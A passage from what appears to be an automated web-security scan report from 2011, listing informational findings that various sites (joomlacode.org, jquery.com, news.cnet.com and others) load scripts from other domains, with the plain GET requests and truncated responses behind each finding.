<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.284. http://joomlacode.org/gf/user/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.285. http://joomlacode.org/gf/user/atrel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/atrel/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/atrel/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:09:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.286. http://joomlacode.org/gf/user/joodaterjoe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/joodaterjoe/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/joodaterjoe/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.287. http://joomlacode.org/gf/user/malkowitch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/malkowitch/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/malkowitch/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.288. http://joomlacode.org/gf/user/mattfaulds1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/mattfaulds1/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/mattfaulds1/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.289. http://joomlacode.org/gf/user/mikesamar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/user/mikesamar/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/mikesamar/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.290. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Jan 2011 23:10:28 GMT
ETag: "4960174-3eb0-7da86100"
Accept-Ranges: bytes
Content-Length: 16048
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

21.291. http://jquery.malsup.com/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.malsup.com
Path:	/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.easing.1.1.1.js
http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:24:54 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 06 Apr 2010 00:35:14 GMT
ETag: "10cdf89-1f7c-483869e727480"
Accept-Ranges: bytes
Content-Length: 8060
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.292. http://jquery.org/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/license

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 Jan 2011 21:47:43 GMT
ETag: "3f80006-206a-8cb49dc0"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 22:43:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.293. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 14599

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

21.294. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

21.295. http://justinbieber.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://justinbieber.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.296. http://keith-wood.name/bookmark.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://keith-wood.name
Path:	/bookmark.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /bookmark.html HTTP/1.1
Host: keith-wood.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:30:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 11 Dec 2010 02:05:21 GMT
ETag: "31d2b34-6fd8-e7371a40"
Accept-Ranges: bytes
Content-Length: 28632
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>jQuery Bookmark</t
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

21.297. http://kontentdesign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kontentdesign.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.298. http://lesterchan.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lesterchan.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://stats.wordpress.com/e-201104.js

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.299. http://linux.maruhn.com/directory.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://linux.maruhn.com
Path:	/directory.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /directory.html HTTP/1.1
Host: linux.maruhn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:34:05 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 21:34:05 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 4100
Content-Length: 10591
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.300. http://linux.maruhn.com/sec/aub.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://linux.maruhn.com
Path:	/sec/aub.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sec/aub.html HTTP/1.1
Host: linux.maruhn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:54:32 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 14:54:32 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.301. http://linux.maruhn.com/sec/aub.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://linux.maruhn.com
Path:	/sec/aub.html/x22

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sec/aub.html/x22 HTTP/1.1
Host: linux.maruhn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:04:40 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:04:40 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 2254
Content-Length: 79871
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.302. http://loadus.exelator.com/load/net.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/net.php

Issue detail

The response dynamically includes the following script from another domain:

http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js

Request

Response

21.303. http://mad4milk.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mad4milk.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />

   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

21.304. http://magazine.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://magazine.joomla.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: magazine.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: C8H10N4O2
X-Powered-By: TMX-194.19
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e4ca47a488ed5dc0028ed0df7e92e4e0=9b4bdea32449b3b75368de62daaab55e; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.305. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.306. http://netlingo.com/feedback.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netlingo.com
Path:	/feedback.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /feedback.php HTTP/1.1
Host: netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:21:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.307. http://network4g.verizonwireless.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network4g.verizonwireless.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
https://scache.vzw.com/globalnav/globalnav.js
https://scache.vzw.com/scripts/accessible/mootools.js
https://scache.vzw.com/scripts/homepage/swfobject.js

Request

GET / HTTP/1.1
Host: network4g.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.308. http://news.cnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.cnet.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.r2d2.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/special/special.riverTwitterAd.compressed.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78
http://tcr.tynt.com/javascripts/Tracer.js?user=cry3Q6LBqr37zJadbi-bnq

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
